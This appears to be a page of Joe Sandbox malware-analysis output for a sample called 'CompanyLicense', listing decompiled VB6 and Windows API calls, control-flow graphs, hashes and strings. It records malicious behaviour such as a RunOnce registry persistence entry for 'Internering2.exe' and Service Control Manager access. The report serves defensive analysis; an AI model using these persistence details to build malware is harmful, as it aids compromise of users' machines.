                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004101DF
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000140), ref: 0041022C
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 00410253
                                      • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041028F
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000068), ref: 004102D6
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004102FD
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410339
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000F8), ref: 00410386
                                      • __vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000), ref: 004103AB
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004103C6
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410402
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000A0), ref: 0041044F
                                      • __vbaStrCopy.MSVBVM60(00000000,?,00403AC4,000000A0), ref: 0041046B
                                      • __vbaI4Var.MSVBVM60(00000009), ref: 00410491
                                      • __vbaI4Var.MSVBVM60(00000008,?,?,00000009), ref: 004104B0
                                      • __vbaVarMove.MSVBVM60 ref: 00410500
                                      • __vbaFreeStr.MSVBVM60 ref: 00410508
                                      • __vbaFreeObjList.MSVBVM60(00000008,?,?,?,00000000,?,?,?,?), ref: 00410544
                                      • __vbaFreeVarList.MSVBVM60(00000002,00000009,00000008), ref: 0041055C
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0041057E
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004105B7
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000A0), ref: 00410604
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0041062B
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410667
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000F8), ref: 004106B4
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004106DB
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410717
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000078), ref: 0041075E
                                      • __vbaChkstk.MSVBVM60(?,?), ref: 0041080E
                                      • __vbaChkstk.MSVBVM60(?,00000009,7C207E50,00005AFD,?,?,?), ref: 00410841
                                      • __vbaChkstk.MSVBVM60(?,00000009,7C207E50,00005AFD,?,?,?), ref: 00410855
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000710), ref: 00410896
                                      • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004108D0
                                      • __vbaFreeVar.MSVBVM60 ref: 004108DE
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004108FD
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410936
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000178), ref: 00410983
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004109AA
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004109E6
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000118), ref: 00410A33
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000714,?,?,000044D0,?,00005633,?,?), ref: 00410AD0
                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,000044D0,?,00005633,?,?), ref: 00410AFC
                                      • __vbaFreeVar.MSVBVM60 ref: 00410B0A
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 00410B29
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410B62
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000078), ref: 00410BA9
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 00410BD0
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410C0C
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000060), ref: 00410C53
                                      • __vbaStrCopy.MSVBVM60(00000000,?,00403AC4,00000060), ref: 00410C91
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000718,?,?,00000000,?,00855264,0009EC81,?), ref: 00410CEF
                                      • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00855264,0009EC81,?), ref: 00410D06
                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000,?,00855264,0009EC81,?), ref: 00410D18
                                      • __vbaOnError.MSVBVM60(000000FF), ref: 00410D29
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,000002B4), ref: 00410D67
                                      • __vbaFreeVar.MSVBVM60(00410E74), ref: 00410E66
                                      • __vbaFreeVar.MSVBVM60(00410E74), ref: 00410E6E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$CheckHresult$New2$Free$List$Chkstk$Move$CallLate$Copy$#529#670Error
                                      • String ID: 3V$BEMISTED$CALICUT$Misbaptize8$OVERGLAMORIZED$SMAAKRAVLET$Tilsjoflingerne9$adkomsthavers$o[>$udsanering$v6_
                                      • API String ID: 1286334570-3999088872
                                      • Opcode ID: fbbd0a40cc8fde54ade90055eb1f579cb741d647193e20425336da36bd4c770b
                                      • Instruction ID: dd565bdb4996f2a50941cfbe9d613efc03694ef50a104e56decc6033536a50dd
                                      • Opcode Fuzzy Hash: fbbd0a40cc8fde54ade90055eb1f579cb741d647193e20425336da36bd4c770b
                                      • Instruction Fuzzy Hash: 9333E371900228EFDB21DF50CC89BD9BBB8BB08305F1041EAE549BB2A1DB795B85DF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A1C14, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 71registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • RegCreateKeyExA.KERNELBASE(80000001,020A53C6,00000000,00000000,00000000,000F003F,00000000,68F644E8,?,020A13FB,?,?,00000000,000000FF,00000007,68F6454C), ref: 020A1C43
                                        • Part of subcall function 020A1C64: RegSetValueExA.KERNELBASE(68F644E8,020A53BB,00000000,00000001,?,?,?,00000062,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A1C74
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: CreateValue
                                      • String ID: Hamid$Software\Microsoft\Windows\CurrentVersion\RunOnce$\Internering2.exe$jjj$R7
                                      • API String ID: 2259555733-3584740790
                                      • Opcode ID: 246c093a9238cfc98265307970185839d6899a5416886dcb48ac1306a6385e54
                                      • Instruction ID: 07c5350f442f957dfd17c04128d5cb0179eaf1771cfb39438faf7a0b0e6c96b8
                                      • Opcode Fuzzy Hash: 246c093a9238cfc98265307970185839d6899a5416886dcb48ac1306a6385e54
                                      • Instruction Fuzzy Hash: E611AA318083C42FD7018BA04E2A7D87F66BF43719FE9918AE5882F0F3D7206501E34A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401480, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 908 401480-4014a4 #100
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: #100
                                      • String ID: VB5!6&*
                                      • API String ID: 1341478452-3593831657
                                      • Opcode ID: ee55a2abea7be7e50601df3df5407d9d57722777f1712851239a1f9e70f32a2a
                                      • Instruction ID: d3e28c841db929235c7877c39c6b6bad081c35512a600fcfd5c01eba573c72dd
                                      • Opcode Fuzzy Hash: ee55a2abea7be7e50601df3df5407d9d57722777f1712851239a1f9e70f32a2a
                                      • Instruction Fuzzy Hash: BCE04EA568E3C21ED31357390D68829BF308E4322030A01EB80C2CF0E3C88C488EC3B7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A9248, Relevance: 1.8, APIs: 1, Instructions: 333COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 909 20a9248-20a9251 910 20a9253-20a9299 909->910 911 20a91e4-20a91ea 909->911 914 20a929b-20a92ea 910->914 915 20a922c-20a922d 910->915 913 20a91eb-20a91ed 911->913 919 20a91f0-20a91f7 913->919 918 20a92ee-20a9414 914->918 916 20a922f-20a9247 915->916 917 20a91c0-20a91c9 915->917 916->909 922 20a91cb-20a91e3 917->922 923 20a915c-20a915d 917->923 926 20a9419-20a9421 918->926 919->919 920 20a91f9 919->920 920->918 922->911 924 20a915f-20a91bf 923->924 925 20a90f0-20a90fd 923->925 924->917 927 20a90ff-20a915a 925->927 928 20a9090-20a9099 925->928 926->926 929 20a9423-20a953a 926->929 927->923 930 20a909b-20a90c6 928->930 931 20a902c-20a902d 928->931 939 20a953c-20a9546 929->939 940 20a95a7-20a96fa call 20a96cf 929->940 933 20a90cb-20a90d9 930->933 934 20a902f-20a908f 931->934 935 20a8fc0-20a8fd3 931->935 936 20a8ecb-20a8fda 933->936 937 20a90df-20a90ee call 20a7c59 933->937 934->928 935->931 936->933 937->913 939->940 944 20a9548-20a954c 939->944 944->940 949 20a954e-20a9552 944->949 949->940 951 20a9554-20a955b 949->951 951->940 953 20a955d-20a9561 951->953 953->940 954 20a9563-20a9567 953->954 954->940 955 20a9569-20a9576 954->955 955->940 956 20a9578-20a9580 955->956 956->940 957 20a9582-20a958a 956->957 957->940 958 20a958c-20a9596 OpenSCManagerA 957->958 959 20a959b-20a95a3 958->959 959->959 960 20a95a5 959->960 960->960
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: 1da4b11abcea70f6f38c6bd4cfe5ca3e0442990a793d84590e8cdcd952b51640
                                      • Instruction ID: ca6b0742df56396d42df22a48d24233af2990d11abec392d1a95f6c76734d54e
                                      • Opcode Fuzzy Hash: 1da4b11abcea70f6f38c6bd4cfe5ca3e0442990a793d84590e8cdcd952b51640
                                      • Instruction Fuzzy Hash: F6C1FB15D4D9CB07C21302B55469384FFB73E93934FC922EA9DA603A36D7622DB48BD2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A652A, Relevance: 1.7, APIs: 1, Instructions: 233COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1053 20a652a-20a6531 1054 20a6533-20a65c3 1053->1054 1055 20a64c4-20a64cd 1053->1055 1056 20a65c8-20a6635 1054->1056 1057 20a64cf-20a6512 1055->1057 1058 20a6460-20a6461 1055->1058 1063 20a6637-20a6733 1056->1063 1061 20a6514-20a6516 1057->1061 1059 20a6463-20a64c3 1058->1059 1060 20a63f4-20a640f GetLongPathNameW 1058->1060 1059->1055 1060->1061 1065 20a6736-20a693f 1063->1065 1068 20a6948-20a694b 1065->1068 1069 20a6943 call 20a6f07 1065->1069 1070 20a694e-20a6a52 1068->1070 1069->1068 1070->1065 1072 20a6a58-20a6a5e 1070->1072 1072->1070 1073 20a6a64-20a6b96 call 20a6f07 * 2 call 20a6f1d 1072->1073
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d63b3d7f884463b7b86cac8e85bc1e0ea578b50880383fc9459a366bac0f3fdf
                                      • Instruction ID: b952f58eb696ebb692c823c1747a23162857eab56522328c65f1134544e8a28c
                                      • Opcode Fuzzy Hash: d63b3d7f884463b7b86cac8e85bc1e0ea578b50880383fc9459a366bac0f3fdf
                                      • Instruction Fuzzy Hash: 18814606C4D9C607C62302F55869290FFBB2D63824BC921DEADE60352BDB532DB49BD3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A0DEA, Relevance: 1.7, APIs: 1, Instructions: 224COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1081 20a0dea-20a0f08 call 20a6f5a call 20a8ec1 1087 20a11fe-20a128c call 20a6f5a * 2 call 20a8ec1 1081->1087 1088 20a0f0e-20a1044 call 20a6f5a 1081->1088 1109 20a806e-20a808a call 20a7679 call 20a8087 1087->1109 1112 20a1292-20a12a2 call 20a6b99 1087->1112 1095 20a104a-20a1053 1088->1095 1096 20a1045 call 20a8ec1 1088->1096 1095->1087 1097 20a1059-20a1070 1095->1097 1096->1095 1099 20a1076-20a109d call 20a7243 1097->1099 1105 20a109f-20a10a4 1099->1105 1106 20a10c0-20a10c7 1099->1106 1108 20a10aa-20a10af 1105->1108 1105->1109 1106->1109 1111 20a10cd-20a10d2 1106->1111 1108->1109 1114 20a10b5-20a10ba 1108->1114 1131 20a808d-20a8097 1109->1131 1111->1109 1115 20a10d8-20a10dd 1111->1115 1123 20a12a8 1112->1123 1124 20a1402-20a144f 1112->1124 1114->1106 1114->1109 1115->1109 1116 20a10e3-20a10eb 1115->1116 1116->1109 1119 20a10f1-20a11f5 1116->1119 1119->1099 1126 20a11f6-20a11fb 1119->1126 1127 20a12b2-20a12bc call 20a32a6 1123->1127 1133 20a1454-20a1462 1124->1133 1126->1087 1135 20a12be-20a13c3 1127->1135 1131->1131 1134 20a8099-20a81ee call 20a80a5 1131->1134 1133->1133 1136 20a1464-20a1560 1133->1136 1142 20a13c9-20a13ce 1135->1142 1143 20a3cc1-20a3cc5 1135->1143 1144 20a1562-20a1566 1136->1144 1145 20a1577-20a157b 1136->1145 1151 20a13fd-20a3caa TerminateProcess 1142->1151 1152 20a13d0-20a13fb call 20a1d90 call 20a6f07 call 20a1c07 1142->1152 1148 20a3cc6-20a3cd7 1143->1148 1146 20a1568-20a1570 call 20a1d90 1144->1146 1147 20a1572 call 20a1f3a 1144->1147 1149 20a179b-20a41c3 call 20a17a5 1145->1149 1150 20a1581-20a158c call 20a1d90 1145->1150 1146->1145 1146->1147 1147->1145 1148->1148 1157 20a3cd9-20a3cdb 1148->1157 1150->1149 1166 20a1592-20a15e7 call 20a833c call 20a1a87 call 20a1fa7 1150->1166 1152->1151 1166->1143 1176 20a15ed-20a15f9 1166->1176 1176->1149 1177 20a5378-20a537e call 20a15fe 1176->1177 1180 20a53a1-20a53af 1177->1180 1181 20a5381-20a539c 1177->1181 1183 20a53b1-20a5413 call 20a1f51 call 20a1d97 1180->1183 1184 20a5416-20a542b 1180->1184 1181->1180 1183->1184 1184->1109
                                      APIs
                                        • Part of subcall function 020A6F5A: LoadLibraryA.KERNELBASE(?,321C9581,?,020A8349,020A32BD,00000000,00000000,00000000,00000000,?,00000000,00000000,020A0719,00000000), ref: 020A70A8
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoadProcessTerminate
                                      • String ID:
                                      • API String ID: 3349790660-0
                                      • Opcode ID: fed15e8bacf1e0e0a90722e7d51ae5c5223626042997814a66a90886415eafea
                                      • Instruction ID: 212c6747a65ba9b1c79d8d63fec5cd149cc99b83f4b916c2d29fa38fd4fc27ef
                                      • Opcode Fuzzy Hash: fed15e8bacf1e0e0a90722e7d51ae5c5223626042997814a66a90886415eafea
                                      • Instruction Fuzzy Hash: 99717A20C087C207DB3212F85C667D8F7776F82734FD41299EDAA431A6D7A26CB48692
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A0F4A, Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                      Download Yara Rule
                                      APIs
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 5a7ed105bffd6e262db7bc094bf646e3a5985201790a90167fae39b72e29eac7
                                      • Instruction ID: f88ee2ddc787480bf99af76f722a127cfa46a29ce55c269e7679fdf910d7fe3b
                                      • Opcode Fuzzy Hash: 5a7ed105bffd6e262db7bc094bf646e3a5985201790a90167fae39b72e29eac7
                                      • Instruction Fuzzy Hash: 43515911C08BC603CB3212F818657D8FB772F43634FD45299ADAA035A6D7A26DB496D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A910C, Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: fecfd0d1c2151d77cc98b26efee1cbc1d6d3be94cd1b3b575fdf8d7702d5cff3
                                      • Instruction ID: 84095f912e33c0c1ea88ec543e7b8cf7607ad801e8b5420552209f934ccd18b2
                                      • Opcode Fuzzy Hash: fecfd0d1c2151d77cc98b26efee1cbc1d6d3be94cd1b3b575fdf8d7702d5cff3
                                      • Instruction Fuzzy Hash: 5251D211D499CA4BC71302B55469384FBB33F52938FC922E9DDA603926D7626DB487C2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A1100, Relevance: 1.7, APIs: 1, Instructions: 156COMMON
                                      Download Yara Rule
                                      APIs
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 417e231660049f498d54b8ee9bc429322e4da0d114d183f1b9930741b34571cd
                                      • Instruction ID: 7684fba3d7f010611ab2c3aa173ea7b3e5cdc7e8301ef398aa7be2cff49ed5d7
                                      • Opcode Fuzzy Hash: 417e231660049f498d54b8ee9bc429322e4da0d114d183f1b9930741b34571cd
                                      • Instruction Fuzzy Hash: C7512814C08BC607CB2211F818A93D8FBB72F53624FD453D99DA6035B6D7A26CB49792
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A8FE0, Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: 1083d16a5d037d2fe77abea0e78a05fe40d1023403d8b862aa5655e6446e527b
                                      • Instruction ID: d8abac01dda19f1be9a2d308c335464d140b9bae24c969ddc2dc895f7d46cfea
                                      • Opcode Fuzzy Hash: 1083d16a5d037d2fe77abea0e78a05fe40d1023403d8b862aa5655e6446e527b
                                      • Instruction Fuzzy Hash: 3441C411E08ACA4BC72306B49469384FBB37F42628FC522D9DDA607976D7726DB4C7C2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A1215, Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6b0a416bf9ec837c602427384d6a912211f6ff4da87dd75a317aaeb87adeecab
                                      • Instruction ID: 095a43bbca57bbf4faa678ca6ae313dbf0c80f96143379b595e883fbc5f4caa7
                                      • Opcode Fuzzy Hash: 6b0a416bf9ec837c602427384d6a912211f6ff4da87dd75a317aaeb87adeecab
                                      • Instruction Fuzzy Hash: B6415620C08BC647CB2216F858653D8FBB72F53634FC453C9DDAA035A6D7622CB59792
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A12C3, Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                      Download Yara Rule
                                      APIs
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 523e81554d5a05ec062d0aecee98b432d9b932d16b3a6e0be8b66fc4692793a4
                                      • Instruction ID: 290dffb33b6e099076741be456bcd18abddd4c5b5de5edaaf34d18f4cec5ac43
                                      • Opcode Fuzzy Hash: 523e81554d5a05ec062d0aecee98b432d9b932d16b3a6e0be8b66fc4692793a4
                                      • Instruction Fuzzy Hash: 32418115C49AC603C62202F91869394FBB72F53A38FC522D99DFA035A6D7632DB487D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A9436, Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: 1e22825d7a5db01c988214b0c8b7df49702fd5f8e987e5f8a87dbbe953031994
                                      • Instruction ID: 0625669338842c35f3185e844364a6d52de8067dcf6323464b1f35b03030894d
                                      • Opcode Fuzzy Hash: 1e22825d7a5db01c988214b0c8b7df49702fd5f8e987e5f8a87dbbe953031994
                                      • Instruction Fuzzy Hash: 1A316D15D499CB0BC22306F55469380FBB73E52938FC922DA9DA603936D7632DB8C7D2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A62F8, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00000200,020A1DCD,?,?,?,?,020A542F,020A5406,?,020A3459,?,00000000,?,00400000), ref: 020A6409
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      • Opcode ID: 8d7eca571039ba57eb9a651f958af724f28c0b75998a5e68d59cebb86131729d
                                      • Instruction ID: ae2ecb66432cde025ddc488167e720c7eb5f9e2fb3fa94aed614b51a0927189f
                                      • Opcode Fuzzy Hash: 8d7eca571039ba57eb9a651f958af724f28c0b75998a5e68d59cebb86131729d
                                      • Instruction Fuzzy Hash: 4F31D709C4D9C747C21302B51869290FF7A3D93828BC921DAADE64352BDB526D788BD3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A8EC6, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: 00cec7d45faa68c3394dbd45594f487b17c93b1af1f42a03ae381eb91b5e5bcb
                                      • Instruction ID: 17342491092617538ee15175d706c772551a7310bbed1a8806d8ca3d7867390c
                                      • Opcode Fuzzy Hash: 00cec7d45faa68c3394dbd45594f487b17c93b1af1f42a03ae381eb91b5e5bcb
                                      • Instruction Fuzzy Hash: DB310631B0070DCEEB5A5EB4C9B87AD73E2AF41368FD44329C9518B9A0D33584C4D744
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A95B9, Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: 81ba387514b4b9f58f765cde2aa5d0714d00e8ecfb57320ee9bf84fcadf8b792
                                      • Instruction ID: 96eb4f5f8747c88025b24eff609d2fda6be987e3699c5c26ad9991ac3766f320
                                      • Opcode Fuzzy Hash: 81ba387514b4b9f58f765cde2aa5d0714d00e8ecfb57320ee9bf84fcadf8b792
                                      • Instruction Fuzzy Hash: 4F31FE05D499CB07C21306B55469380FFB72D53938BC922D99DB603936D7632DB887D2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A6F6E, Relevance: 1.6, APIs: 1, Instructions: 84libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNELBASE(?,321C9581,?,020A8349,020A32BD,00000000,00000000,00000000,00000000,?,00000000,00000000,020A0719,00000000), ref: 020A70A8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 9c6579e6e1d494bcebf3d3d45942a780aaee11cae329b57b1be1856aef88c9f0
                                      • Instruction ID: 4788fcbe123dfe70cccd3e4edd1a83775afec7b34335f580f435784670c5ca5f
                                      • Opcode Fuzzy Hash: 9c6579e6e1d494bcebf3d3d45942a780aaee11cae329b57b1be1856aef88c9f0
                                      • Instruction Fuzzy Hash: 0221CE05C499CB03C21212F91465684FB772D92934BC571DEADE603537D7622DB44BD3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 020A3BAC, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
